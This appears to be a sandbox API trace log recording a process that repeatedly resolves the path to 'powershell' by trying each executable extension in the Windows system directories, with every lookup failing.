	[0819.528] SetErrorMode (uMode=0x1) returned 0x1
	[0819.528] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.574] SetErrorMode (uMode=0x1) returned 0x1
	[0825.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.576] SetErrorMode (uMode=0x1) returned 0x1
	[0825.576] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.576] SetErrorMode (uMode=0x1) returned 0x1
	[0825.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.577] SetErrorMode (uMode=0x1) returned 0x1
	[0825.577] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.577] SetErrorMode (uMode=0x1) returned 0x1
	[0825.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.577] SetErrorMode (uMode=0x1) returned 0x1
	[0825.577] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.578] SetErrorMode (uMode=0x1) returned 0x1
	[0825.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.578] SetErrorMode (uMode=0x1) returned 0x1
	[0825.578] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.578] SetErrorMode (uMode=0x1) returned 0x1
	[0825.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.579] SetErrorMode (uMode=0x1) returned 0x1
	[0825.579] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.579] SetErrorMode (uMode=0x1) returned 0x1
	[0825.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.580] SetErrorMode (uMode=0x1) returned 0x1
	[0825.580] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.580] SetErrorMode (uMode=0x1) returned 0x1
	[0825.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.580] SetErrorMode (uMode=0x1) returned 0x1
	[0825.580] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.581] SetErrorMode (uMode=0x1) returned 0x1
	[0825.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.581] SetErrorMode (uMode=0x1) returned 0x1
	[0825.581] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.581] SetErrorMode (uMode=0x1) returned 0x1
	[0825.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.582] SetErrorMode (uMode=0x1) returned 0x1
	[0825.582] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.582] SetErrorMode (uMode=0x1) returned 0x1
	[0825.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.582] SetErrorMode (uMode=0x1) returned 0x1
	[0825.583] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.583] SetErrorMode (uMode=0x1) returned 0x1
	[0825.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.583] SetErrorMode (uMode=0x1) returned 0x1
	[0825.583] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.584] SetErrorMode (uMode=0x1) returned 0x1
	[0825.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.584] SetErrorMode (uMode=0x1) returned 0x1
	[0825.584] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.584] SetErrorMode (uMode=0x1) returned 0x1
	[0825.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.585] SetErrorMode (uMode=0x1) returned 0x1
	[0825.585] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.585] SetErrorMode (uMode=0x1) returned 0x1
	[0825.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.585] SetErrorMode (uMode=0x1) returned 0x1
	[0825.585] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.586] SetErrorMode (uMode=0x1) returned 0x1
	[0825.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0825.586] SetErrorMode (uMode=0x1) returned 0x1
	[0825.586] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.586] SetErrorMode (uMode=0x1) returned 0x1
	[0825.587] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0825.587] SetErrorMode (uMode=0x1) returned 0x1
	[0825.587] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.587] SetErrorMode (uMode=0x1) returned 0x1
	[0825.587] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0825.588] SetErrorMode (uMode=0x1) returned 0x1
	[0825.588] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.588] SetErrorMode (uMode=0x1) returned 0x1
	[0825.588] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0825.588] SetErrorMode (uMode=0x1) returned 0x1
	[0825.588] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.589] SetErrorMode (uMode=0x1) returned 0x1
	[0825.589] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0825.589] SetErrorMode (uMode=0x1) returned 0x1
	[0825.589] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.589] SetErrorMode (uMode=0x1) returned 0x1
	[0825.590] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0825.590] SetErrorMode (uMode=0x1) returned 0x1
	[0825.590] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.590] SetErrorMode (uMode=0x1) returned 0x1
	[0825.590] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0825.591] SetErrorMode (uMode=0x1) returned 0x1
	[0825.591] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.591] SetErrorMode (uMode=0x1) returned 0x1
	[0825.591] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0825.591] SetErrorMode (uMode=0x1) returned 0x1
	[0825.591] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.592] SetErrorMode (uMode=0x1) returned 0x1
	[0825.592] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0825.592] SetErrorMode (uMode=0x1) returned 0x1
	[0825.592] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.592] SetErrorMode (uMode=0x1) returned 0x1
	[0825.592] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0825.593] SetErrorMode (uMode=0x1) returned 0x1
	[0825.593] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.593] SetErrorMode (uMode=0x1) returned 0x1
	[0825.593] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0825.593] SetErrorMode (uMode=0x1) returned 0x1
	[0825.593] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.594] SetErrorMode (uMode=0x1) returned 0x1
	[0825.594] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0825.594] SetErrorMode (uMode=0x1) returned 0x1
	[0825.594] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0825.595] SetErrorMode (uMode=0x1) returned 0x1
	[0825.595] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0828.677] SetErrorMode (uMode=0x1) returned 0x1
	[0828.677] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.677] SetErrorMode (uMode=0x1) returned 0x1
	[0828.678] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0828.678] SetErrorMode (uMode=0x1) returned 0x1
	[0828.678] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.678] SetErrorMode (uMode=0x1) returned 0x1
	[0828.678] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0828.679] SetErrorMode (uMode=0x1) returned 0x1
	[0828.679] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.679] SetErrorMode (uMode=0x1) returned 0x1
	[0828.679] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0828.679] SetErrorMode (uMode=0x1) returned 0x1
	[0828.679] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0828.680] SetErrorMode (uMode=0x1) returned 0x1
	[0828.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0828.680] SetErrorMode (uMode=0x1) returned 0x1
